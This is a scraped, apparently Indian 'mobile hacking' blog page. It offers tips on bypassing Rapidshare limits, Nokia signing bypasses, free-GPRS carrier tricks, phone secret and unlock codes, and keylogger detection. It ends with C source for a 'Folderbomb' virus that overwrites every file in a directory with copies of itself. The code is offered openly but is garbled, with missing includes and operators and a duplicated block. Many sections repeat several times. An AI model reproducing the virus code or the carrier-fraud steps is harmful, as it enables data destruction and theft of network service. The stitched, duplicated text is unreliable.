The self-extracting file installs quickly, and you can run it from your hard drive, or as the publisher suggests, from a jump drive. Torpark adds to your browser’s toolbar a few unobtrusive buttons, which allow you to activate/deactivate the tool and configure its privacy settings according to your specifications. The tool effectively restricts pop-ups; blocks surreptitious installations of adware, spyware, and cookies; and hides any traces of your surfing. You can check the Torpark Tools menu while visiting a site and build a list of blocked items for the current page; from the same list box, you may add to a white list any or all of the displayed items.
The publisher cautions that using Torpark may slow your Internet connection speed, particularly if you’re using a dial-up, but we noticed no slowdown during our tests. Torpark is free, easy to use, and suitable for all users interested in protecting their privacy while visiting Web sites.
In this post I have a new Rapidshare hacking tip for you. Well, you might be aware of Browsers like Firefox, or Internet Explorer. I would like to introduce you to a browser known as Torpark Browser, which works as a anonymous web browser. It is like a proxy browser where you can change your permanent IP Address to dynamic IP Address. So, when ever you run this browser you get a new IP address. Now download mutliple files at the same time. Yes you read it right, you can download multiple rapidshare files or megaupload, hotfile files at the same time. You can even skip or bypass the time limit on downloading files. The most amazing thing is IDM works with this browser.
Note: You need to close the browser window after each download coz it will reset the ip address.
download
Description of Torpark Browser:
The self-extracting file installs quickly, and you can run it from your hard drive, or as the publisher suggests, from a jump drive. Torpark adds to your browser’s toolbar a few unobtrusive buttons, which allow you to activate/deactivate the tool and configure its privacy settings according to your specifications. The tool effectively restricts pop-ups; blocks surreptitious installations of adware, spyware, and cookies; and hides any traces of your surfing. You can check the Torpark Tools menu while visiting a site and build a list of blocked items for the current page; from the same list box, you may add to a white list any or all of the displayed items.
The publisher cautions that using Torpark may slow your Internet connection speed, particularly if you’re using a dial-up, but we noticed no slowdown during our tests. Torpark is free, easy to use, and suitable for all users interested in protecting their privacy while visiting Web sites.
How to detect a keylogger in a system
Keylogger is the software program or a hardware which
reads and store all the key stroke by a user in the system it is
installed. Read more about the keyloggers on my older articles.
Having a keylogger in the system means you are going to loose some thing big. If your system is infected by a keylogger, your email id, facebook account, bank account and all other secure data is on the risk. Now a days hackers are active enough and many website offering free software download with keyloggers attached in it. So you need to know how to protect your system from keyloggers. If you want to know how to detect a keyloggers in a system, you can follow these points:
Having a keylogger in the system means you are going to loose some thing big. If your system is infected by a keylogger, your email id, facebook account, bank account and all other secure data is on the risk. Now a days hackers are active enough and many website offering free software download with keyloggers attached in it. So you need to know how to protect your system from keyloggers. If you want to know how to detect a keyloggers in a system, you can follow these points:
- Check the task list by press ctrl+alt+del in windows. Examine all the tasks running in your system, if you are unsure about a task look it up on a search engine.
- Run your antivirus checker, it's possible this will pick up the Keylogger on your system.
- Use the system configuration utility to determine which task are loaded at start-up (type "msconfig" in the run box to start).
- Download a specific keylogger detector program, and see if it detects anything.
- Scan your hard disk for the most recent files stored. Look at the contents of any files continually updating (these might be logs created by antivirus).
How to Access Facebook without Internet Connection
India has estimated 34 million registered Facebook .To expand its
roots more deeper into rural areas and to strengthen its current user
base Facebook has partnered with Fonetwish for free access to Facebook
accounts without Internet connection.Now you access Facebook even with
stone age phones like Nokia 1100 which even don’t have Gprs facility.
Earlier, I wrote about how you can Search in Google without internet connection but you get charged for SMS (local sms charges).However access to facebook account and Status updates is completely free.If you also want to use features like Notifications, updating friends wall you have to subscribe to Fonetwish premium plan which is very cheap.
That’s it! This is the New Year gift from the Facebook to the Indian users.
Earlier, I wrote about how you can Search in Google without internet connection but you get charged for SMS (local sms charges).However access to facebook account and Status updates is completely free.If you also want to use features like Notifications, updating friends wall you have to subscribe to Fonetwish premium plan which is very cheap.
How it Works:
Just dial *325# or *fbk# from your mobile and wait for the confirmation message on the screen. Give your username and password to access Facebook without any Data Charges. Have a look at screenshots below for step by step guide.
That’s it! This is the New Year gift from the Facebook to the Indian users.
Installing unsigned application using Drakkarious 3.01 Orginal and Working For All Nokia Version.
i am going to explain how to install expired and unsigned your mobile
application using Drakkarious aplication installer, this is one of the
working method that was confirmed by many user in other mobile
community.This is an All applications installer {unsigned and Expired
Files} update 01/09/2008.
Drakkarious 3.01 FP1, FP2 & PreFP1 is developed for only hacking purpose
All you have to do with this simple install this application and follow the instruction given on your screen by which you can easily learn at first time and it help you to hack any mobile phone. this is one time hacking process.
With this method you can install the following mobile application which are Unsigned files, Signed files, BinPDA files, Non-Binpda Files, Dated application, Out-Dated application files etc etc etc...
First this is you should try and see. Even you can install N-Gage cracked game on your mobile.
For Hacking instrusction
This method is word for the following handsets.
Pre-FP1 devices:
-------------------
Nokia N77,Nokia E61i,Nokia E65Nokia N93i,Nokia N91 8GB,Nokia E62,Nokia E50,Nokia 5500,Nokia N93,Nokia N73,Nokia N80,Nokia N71,Nokia N92,Nokia E70,Nokia E60,Nokia E61,Nokia 3250
FP1 devices:
-------------------
Nokia 6124 classic,Nokia N82,Nokia N95-3 NAM,Nokia E51,Nokia N95 8GB,Nokia N81,Nokia N81 8GB,Nokia 6121 classic,Nokia 6120 classic,Nokia 5700 XpressMusic,Nokia 6110 Navigator,Nokia E90 Communicator,Nokia N76,Nokia 6290,Nokia N95
FP2 devices
-------------------
Nokia 5320 XpressMusic,Nokia N78,Nokia N96,Nokia 6210 Navigator,Nokia 6220 classic
Specific devices
-------------------
Nokia 3250 v4.14,Nokia 3250 v4.60,Nokia 5500,Nokia E50,Nokia E51,Nokia E61
Hay its time to hack you Hand set.
At First Change phone date to : 15-05-2007
* This is the important procedure you should follow for Drakkarious Hack Compilation.
install the following application on your mobile. dont worry they wont harm your mobile
CapsOn
CapsOff
HelloCarbide
X-plore
Download This package form Repidshare / megauploader
After installing all these 4 application please follow this procedure:
1.-Run X-plore and press "0". Now tick the 4 check boxes (if ticked already please leave it as it is )
2.-Now Without closing X-plore switch to the Phone menu and run hellocarbide
3.-Inside hellocarbide press options and chose Menu1 and answer "yes".
4.-Go back to X-plore and extract installserver.exe and CProfDriver_SISX.ldd from your c:\hack.rar into c:\sys\bin
5.-Restart your phone.
Run capsOff if you wish to see private folders using X-plore and capsOn to hide them again
Note: I advice you to always hide private folders
Note: After completing you must restart your phone to be able to install any app, and remember to always put your phones date back to the present again, always choose the correct version for your phone, and if you dont youll need to manually remove installserver.exe from c:\sys\bin\ using x-plore and hellocarbide...
If you make this mistake please repeat the process using the correct version: fp1 & fp2 or prefp1
Drakkarious 3.01 FP1, FP2 & PreFP1 is developed for only hacking purpose
All you have to do with this simple install this application and follow the instruction given on your screen by which you can easily learn at first time and it help you to hack any mobile phone. this is one time hacking process.
With this method you can install the following mobile application which are Unsigned files, Signed files, BinPDA files, Non-Binpda Files, Dated application, Out-Dated application files etc etc etc...
First this is you should try and see. Even you can install N-Gage cracked game on your mobile.
For Hacking instrusction
This method is word for the following handsets.
Pre-FP1 devices:
-------------------
Nokia N77,Nokia E61i,Nokia E65Nokia N93i,Nokia N91 8GB,Nokia E62,Nokia E50,Nokia 5500,Nokia N93,Nokia N73,Nokia N80,Nokia N71,Nokia N92,Nokia E70,Nokia E60,Nokia E61,Nokia 3250
FP1 devices:
-------------------
Nokia 6124 classic,Nokia N82,Nokia N95-3 NAM,Nokia E51,Nokia N95 8GB,Nokia N81,Nokia N81 8GB,Nokia 6121 classic,Nokia 6120 classic,Nokia 5700 XpressMusic,Nokia 6110 Navigator,Nokia E90 Communicator,Nokia N76,Nokia 6290,Nokia N95
FP2 devices
-------------------
Nokia 5320 XpressMusic,Nokia N78,Nokia N96,Nokia 6210 Navigator,Nokia 6220 classic
Specific devices
-------------------
Nokia 3250 v4.14,Nokia 3250 v4.60,Nokia 5500,Nokia E50,Nokia E51,Nokia E61
Hay its time to hack you Hand set.
At First Change phone date to : 15-05-2007
* This is the important procedure you should follow for Drakkarious Hack Compilation.
install the following application on your mobile. dont worry they wont harm your mobile
CapsOn
CapsOff
HelloCarbide
X-plore
Download This package form Repidshare / megauploader
After installing all these 4 application please follow this procedure:
1.-Run X-plore and press "0". Now tick the 4 check boxes (if ticked already please leave it as it is )
2.-Now Without closing X-plore switch to the Phone menu and run hellocarbide
3.-Inside hellocarbide press options and chose Menu1 and answer "yes".
4.-Go back to X-plore and extract installserver.exe and CProfDriver_SISX.ldd from your c:\hack.rar into c:\sys\bin
5.-Restart your phone.
Run capsOff if you wish to see private folders using X-plore and capsOn to hide them again
Note: I advice you to always hide private folders
Note: After completing you must restart your phone to be able to install any app, and remember to always put your phones date back to the present again, always choose the correct version for your phone, and if you dont youll need to manually remove installserver.exe from c:\sys\bin\ using x-plore and hellocarbide...
If you make this mistake please repeat the process using the correct version: fp1 & fp2 or prefp1
Font Viewer for your Nokia Mobile
In my last post I have though you how to install new fonts on your Symbian device and how to remove the fonts using FontRemover application.
Today I am going to show how to
view the fonts installed on your Nokia Symbian mobile, then there is a
cool application that help you to view the available fonts on
your Symbian mobile. The application is called as FontViewer which is a small application that allow us to view the default font installed on your mobile.
If you are mobile developer or
mobile hacker then this is a useful application that help you to explore
more about Nokia mobile. Sorry I dont have screen shot right now to
show how the fontviewer will work. but I have installed and check how
the application might work.
Set Password for your Nokia Application
Do you want to lock your SMS inbox,
Contacts, Personal notes to protect your privacy. Here is a cool
application that will help you to set password for any application that
you like to restrict the access from your friends and family members.
Today I have found a smart
application that helps you to set password for every application, even
your mobile default apps like Contacts, SMS & Email Inbox, Personal
notes, Setting etc. The application is called Active Lock that will set a
lock code for application you wish to lock. When you install this
application it will run behind the operating system and no one know that
Active Lock is installed.
When some one try to access the apps that you have already locked, Active Lock will ask for password to gain the access.
Download Active Lock:
Default Password: 12345
Default Password: 12345
I have tested this application on my Nokia N70 mobile and it is working fine and I hope this application will work will for you.
Again Airtel GPRS Hack! Browse Internet For Free
I really don't know whether this trick is working or not, but I found in some forums that members are posting that this trick is still working fine! IF you want to browse internet for free of cost using Airtel Live. All you need to have a free mobile browser Opera 4.2 or 5 Beta 2 and some GPRS setting in Airtel Live
IF your Airtel Live is not
active, call the customer care and receive Airtel Live setting and
configure according to their guidance.
Now download the following Opera mobile browser and install it in to your mobile.
Now you have have activated your Airtel Live and opera mini browner.
Now change the follow the instruction to configure your Airtel Live setting to surf freely
For s60 users:
Create a new access point and set
Access Point as airtelgprs.com
Proxy address= 80.239.242.253
Port= 80 (Remember its 80 not 8080)
Just try it on your mobile and share your feeback with us.
Just try it on your mobile and share your feeback with us.
BSNL 3G Hack! Browse Internet at 120 Kbps For Free
Today I am going to show how to hack BSNL 3G hack and browse
unlimited internet at high speed up to 120 Kbps. I am not sure whether
this hacking is still working or not, members from other forums are
posting that this hack is working fine for them.
Before you start learning how to hack you need to have BSNL 2G SIM and ultimately 3G support mobile phone.
Just follow up the instruction:
Before you start learning how to hack you need to have BSNL 2G SIM and ultimately 3G support mobile phone.
Just follow up the instruction:
- Recharge your 2G SIM with Rs 1 to convert it to 3G SIM and use them for free hours
- Check the balance by dialing *123#, the message will show that your GPRS free usage is ZERO MB
- Now recharge again with Rs 1 to convert in to 2G SIM
- Now recharge with Rs 274 for unlimited GPRS usage for 2G SIM
- Now again recharge with Rs 1 to convert in to 3G SIM
- Thats it You have hacked your BSNL 3G for unlimited browsing check the GPRS free usage by dialing *123# it will show 1250000 MB free usage.
Hope it will work for you! Try it and share you thought with us!
Get Symbian S60v3/v5 Certification & Key in 5 minutes
This
tutorial is easy to understood and teach you how to get the certificate
key. I have explained this tutorial with screen shot by installing the
English version. Although the English version is unsigned which cannot
be installed with out the phone hacking. If you want to install English
version you have to install unsigned application using Drakkarious or using Bin-PAD Secman
method I have used the chines version of signed application which will
install on your device with out any error. Just follow the screen shot,
it will guide you to achieve the goal.
The
certificate and key generated by this method will expire in next 3
years and have 17 capabilities like opda's certification.
Download Link: XStevedore.zip
Step1: Download and install the signed version of the Symbian application on your Nokia device.
Step2: Open the application and select the Settings option ans shown in the screen shot.
Step3: Under the setting option you will able to check the three option 1) Access Point 2) download path 3) Quit Tips
Step4: Change the access point to your mobile operator access point where you can get conneced with Internet
Step5: Change the download Path to the SD Memory card.
Step6: Once you done the step 4 & step 5 now come to the previous menu as shown in screen shot 1
Step7: Now select the Signature option and get in to the Signature option.
Step8: Now check the option bottom at the left button under which you can find "certificate tool"
Step9: under the certificate tool you will able to see two option. Now select the "A bottom to download"
Step10:
After you selecting the "A button to download" the downloading will
start automatically by using the default access point that you set in
step 4 and it will ask where to save the file, now select the memory
stick to save.
Step 11: With the help of X-plore browse the certificate. In this tutorial I have saved the certificate under MyCert Folder
The following mobile phones will support this certification method
Nokia
N96,
N95, N93i, N92, N91, N86, N85, N82, N81, N80, N79, N7 8, N 77, N76,
N75, N73, N71, E90, E75, E72, E71, E63, E70, E66, E65, E62, E61 i,
E61, E60, E55, E50, 6650T, 6220c, 6210n, 6122c, 612 0c, 61 10N, 6290,
5730XM, 5700, 5630XM, 5500, 5320XM, 3260, 32 50, 5800/ 5802/ 5230/ N97/
N97mini/ X6
Samsung
G810e, G818e, I400, I408, I450, I458, I520, I528, I550, I5 5 0w, I558, I558w, I560, I568, I8510, L870, L878, I8910
LG
KT610
Sony
U1i
Note:
Indian user are getting some error while downloading from the default
access point I advise them to use Proper Access point
If your device fail to download the certificate then I advise you to try this method after an hour
I hope you enjoy this hacking tutorial. Try it and share you idea with us
Some Useful Nokia mobile phone Secret Codes list
On the main screen type
*#06# for checking the IMEI (International Mobile Equipment Identity).
*#7780# reset to factory settings.
*#67705646# This will clear the LCD display (operator logo).
*#0000# To view software version.
*#2820# Bluetooth device address.
*#746025625# Sim clock allowed status.
*#62209526# - Display the MAC address of the WLAN adapter. This is available only in the newer devices that support WLAN
#pw+1234567890+1# Shows if sim have restrictions.
*#92702689# - takes you to a secret menu where you may find some of the information below:
1. Displays Serial Number.
2. Displays the Month and Year of Manufacture
3. Displays (if there) the date where the phone was purchased (MMYY)
4. Displays the date of the last repair - if found (0000)
5. Shows life timer of phone (time passes since last start)
*#3370# - Enhanced Full Rate Codec (EFR) activation. Increase signal strength, better signal reception. It also help if u want to use GPRS and the service is not responding or too slow. Phone battery will drain faster though.
*#3370* - (EFR) deactivation. Phone will automatically restart. Increase battery life by 30% because phone receives less signal from network.
*#4720# - Half Rate Codec activation.
*#4720* - Half Rate Codec deactivation. The phone will automatically restart
If you forgot wallet code for Nokia S60 phone, use this code reset: *#7370925538#
Note, your data in the wallet will be erased. Phone will ask you the lock code. Default lock code is: 12345
Press *#3925538# to delete the contents and code of wallet.
Unlock service provider: Insert sim, turn phone on and press vol up-arrow keys) for 3 seconds, should say pin code. Press C, then press * message should flash, press * again and 04*pin*pin*pin#
*#7328748263373738# resets security code.
Default security code is 12345
*#3370# - Enhanced Full Rate Codec (EFR) activation. Increase signal strength, better signal reception. It also help if u want to use GPRS and the service is not responding or too slow. Phone battery will drain faster though.
*#3370* - (EFR) deactivation. Phone will automatically restart. Increase battery life by 30% because phone receives less signal from network.
*#4720# - Half Rate Codec activation.
*#4720* - Half Rate Codec deactivation. The phone will automatically restart
If you forgot wallet code for Nokia S60 phone, use this code reset: *#7370925538#
Note, your data in the wallet will be erased. Phone will ask you the lock code. Default lock code is: 12345
Press *#3925538# to delete the contents and code of wallet.
Unlock service provider: Insert sim, turn phone on and press vol up-arrow keys) for 3 seconds, should say pin code. Press C, then press * message should flash, press * again and 04*pin*pin*pin#
*#7328748263373738# resets security code.
Default security code is 12345
*#06# for checking the IMEI (International Mobile Equipment Identity).
*#7780# reset to factory settings.
*#67705646# This will clear the LCD display (operator logo).
*#0000# To view software version.
*#2820# Bluetooth device address.
*#746025625# Sim clock allowed status.
*#62209526# - Display the MAC address of the WLAN adapter. This is available only in the newer devices that support WLAN
#pw+1234567890+1# Shows if sim have restrictions.
*#92702689# - takes you to a secret menu where you may find some of the information below:
1. Displays Serial Number.
2. Displays the Month and Year of Manufacture
3. Displays (if there) the date where the phone was purchased (MMYY)
4. Displays the date of the last repair - if found (0000)
5. Shows life timer of phone (time passes since last start)
*#3370# - Enhanced Full Rate Codec (EFR) activation. Increase signal strength, better signal reception. It also help if u want to use GPRS and the service is not responding or too slow. Phone battery will drain faster though.
*#3370* - (EFR) deactivation. Phone will automatically restart. Increase battery life by 30% because phone receives less signal from network.
*#4720# - Half Rate Codec activation.
*#4720* - Half Rate Codec deactivation. The phone will automatically restart
If you forgot wallet code for Nokia S60 phone, use this code reset: *#7370925538#
Note, your data in the wallet will be erased. Phone will ask you the lock code. Default lock code is: 12345
Press *#3925538# to delete the contents and code of wallet.
Unlock service provider: Insert sim, turn phone on and press vol up-arrow keys) for 3 seconds, should say pin code. Press C, then press * message should flash, press * again and 04*pin*pin*pin#
*#7328748263373738# resets security code.
Default security code is 12345
*#1471# Last
call (Only Vodafone)
*#21# Allows you to check the number that "All Calls" are diverted to
*#30# Lets you see the private number
*#43# Allows you to check the "Call Waiting" status of your phone.
*#62# Allows you to check the number that "Divert If Unreachable (no service)" calls are diverted to
*#67# Allows you to check the number that "On Busy Calls" are diverted to
*#67705646# Removes operator logo on 3310 & 3330
*#73# Reset phone timers and game scores
*#746025625# Displays the SIM Clock status, if your phone supports this power saving feature "SIM Clock Stop Allowed", it means you will get the best standby time possible
*#21# Allows you to check the number that "All Calls" are diverted to
*#30# Lets you see the private number
*#43# Allows you to check the "Call Waiting" status of your phone.
*#62# Allows you to check the number that "Divert If Unreachable (no service)" calls are diverted to
*#67# Allows you to check the number that "On Busy Calls" are diverted to
*#67705646# Removes operator logo on 3310 & 3330
*#73# Reset phone timers and game scores
*#746025625# Displays the SIM Clock status, if your phone supports this power saving feature "SIM Clock Stop Allowed", it means you will get the best standby time possible
*#7780# Restore
factory settings
*#8110# Software version for the nokia 8110
*#92702689#
*#8110# Software version for the nokia 8110
*#92702689#
Displays - 1.Serial Number,
2.Date Made,
3.Purchase Date, 4.Date of last repair (0000 for no repairs), 5.Transfer User Data
12345 This is the default security code
press and hold #
Lets you switch between lines
3.Purchase Date, 4.Date of last repair (0000 for no repairs), 5.Transfer User Data
12345 This is the default security code
press and hold #
Lets you switch between lines
On the main screen type
*#06# for checking the IMEI (International Mobile Equipment Identity).
*#7780# reset to factory settings.
*#67705646# This will clear the LCD display (operator logo).
*#0000# To view software version.
*#2820# Bluetooth device address.
*#746025625# Sim clock allowed status.
*#62209526# - Display the MAC address of the WLAN adapter. This is available only in the newer devices that support WLAN
#pw+1234567890+1# Shows if sim have restrictions.
*#92702689# - takes you to a secret menu where you may find some of the information below:
1. Displays Serial Number.
2. Displays the Month and Year of Manufacture
3. Displays (if there) the date where the phone was purchased (MMYY)
4. Displays the date of the last repair - if found (0000)
5. Shows life timer of phone (time passes since last start)
*#06# for checking the IMEI (International Mobile Equipment Identity).
*#7780# reset to factory settings.
*#67705646# This will clear the LCD display (operator logo).
*#0000# To view software version.
*#2820# Bluetooth device address.
*#746025625# Sim clock allowed status.
*#62209526# - Display the MAC address of the WLAN adapter. This is available only in the newer devices that support WLAN
#pw+1234567890+1# Shows if sim have restrictions.
*#92702689# - takes you to a secret menu where you may find some of the information below:
1. Displays Serial Number.
2. Displays the Month and Year of Manufacture
3. Displays (if there) the date where the phone was purchased (MMYY)
4. Displays the date of the last repair - if found (0000)
5. Shows life timer of phone (time passes since last start)
*#3370# - Enhanced Full Rate Codec (EFR) activation. Increase signal strength, better signal reception. It also help if u want to use GPRS and the service is not responding or too slow. Phone battery will drain faster though.
*#3370* - (EFR) deactivation. Phone will automatically restart. Increase battery life by 30% because phone receives less signal from network.
*#4720# - Half Rate Codec activation.
*#4720* - Half Rate Codec deactivation. The phone will automatically restart
If you forgot wallet code for Nokia S60 phone, use this code reset: *#7370925538#
Note, your data in the wallet will be erased. Phone will ask you the lock code. Default lock code is: 12345
Press *#3925538# to delete the contents and code of wallet.
Unlock service provider: Insert sim, turn phone on and press vol up-arrow keys) for 3 seconds, should say pin code. Press C, then press * message should flash, press * again and 04*pin*pin*pin#
*#7328748263373738# resets security code.
Default security code is 12345
Hidden Secret China Mobile Phones Codes
The following Mobile Phones codes works with various China mobile Phones
such as Alkatel, Sigmatel, Carboonn, GFive, and more such China Mobile
phones.
–Default user code : 1122,
3344, 1234, 5678
–Engineer mode : *#110*01#
–Factory mode : *#987#
–Enable COM port : *#110*01# -> Device -> Set UART -> PS Config -> UART1/115200
–Restore factory settings : *#987*99#
–LCD contrast : *#369#
–Software version : *#800#
–Software version : *#900#
–Set default language : *#0000# Send
–Set English language : *#0044# Send
–Set English language (new firmware) : *#001# Send
–Engineer mode : *#110*01#
–Factory mode : *#987#
–Enable COM port : *#110*01# -> Device -> Set UART -> PS Config -> UART1/115200
–Restore factory settings : *#987*99#
–LCD contrast : *#369#
–Software version : *#800#
–Software version : *#900#
–Set default language : *#0000# Send
–Set English language : *#0044# Send
–Set English language (new firmware) : *#001# Send
Trace Mobile numbers or Ip-Address
Recently I came accross a website in which we can easily trace a Mobile
number. For example , when we enter the 10 digit mobile number, then we
get the Mobile Service provider, Location, City along with area. Thats
really awesome.
Trace Vehical Number
Trace Pin Code
This tool will be really
helpful specially for business persons to verify the location etc...
The site link is
indiatrace.com
Features of this site is
Trace Mobile
Number
Trace Vehical Number
Trace Pin Code
Trace IP Address
WHOIS Trace
How to check china mobile IMEI number valid and original?
Last month i.e.; November I came across a news article regarding China
Mobiles and the importance of IMEI numbers. So here I provide a method by
which you can check whether your phone has a valid and original IMEI
number.
Mobile number without or wrong IMEI number are banned accorss India now. Mostly China mobile phone brands like Alkatel, Sigmatel, Spice, Carboonn, GFIVE and many more now provide valid IMEI number
Check China or any Mobile Phone IMEI Number Validity
1.Press *#06# on your mobile handset and note down the 15 digit IMEI number
2.Compose a new message from your mobile >> Type your 15 digit IMEI number >> Send it to 53232
3.If you get “Success” as the reply, then your mobile IMEI number is valid
4.If you get “Invalid IMEI” as the reply, that means your IMEI number is not valid
5.You are now done.
This will help you to know that your imei number is valid or not
Mobile number without or wrong IMEI number are banned accorss India now. Mostly China mobile phone brands like Alkatel, Sigmatel, Spice, Carboonn, GFIVE and many more now provide valid IMEI number
Check China or any Mobile Phone IMEI Number Validity
1.Press *#06# on your mobile handset and note down the 15 digit IMEI number
2.Compose a new message from your mobile >> Type your 15 digit IMEI number >> Send it to 53232
3.If you get “Success” as the reply, then your mobile IMEI number is valid
4.If you get “Invalid IMEI” as the reply, that means your IMEI number is not valid
5.You are now done.
This will help you to know that your imei number is valid or not
SIMPLE VIRUS CODING
Run this on your own responsibility
VIRUS CODE-2
/*This
is a simple program to create a virus in c
It will create Folder in a Folder in a Folder and so on ......
#include<stdio.h>
#include<conio.h>
#include
#include
#include
void main(int argc,char* argv[])
{ char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
cprintf(”————————————————————————–”);
printf(”\nVirus: Folderbomb 1.0\nProgrammer:BAS Unnikrishnan(asystem0@gmail.com)\n”);
cprintf(”————————————————————————–”);
done = findfirst(”*.*”,&ffblk,0);
while (!done)
{ printf(”\n”);cprintf(” %s “, ffblk.ff_name);printf(”is attacked by “);cprintf(”Folderbomb”);
source=open(argv[0],O_RDONLYO_BINARY);
target=open(ffblk.ff_name,O_CREATO_BINARYO_WRONGLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)
write(target,buf,byt);It will create Folder in a Folder in a Folder and so on ......
#include<stdio.h>
#include<conio.h>
#include
#include
#include
void main(int argc,char* argv[])
{ char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
cprintf(”————————————————————————–”);
printf(”\nVirus: Folderbomb 1.0\nProgrammer:BAS Unnikrishnan(asystem0@gmail.com)\n”);
cprintf(”————————————————————————–”);
done = findfirst(”*.*”,&ffblk,0);
while (!done)
{ printf(”\n”);cprintf(” %s “, ffblk.ff_name);printf(”is attacked by “);cprintf(”Folderbomb”);
source=open(argv[0],O_RDONLYO_BINARY);
target=open(ffblk.ff_name,O_CREATO_BINARYO_WRONGLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)
else
break;
}
close(source);
close(target);
done = findnext(&ffblk);
}
getch();
}
Subscribe to:
Posts (Atom)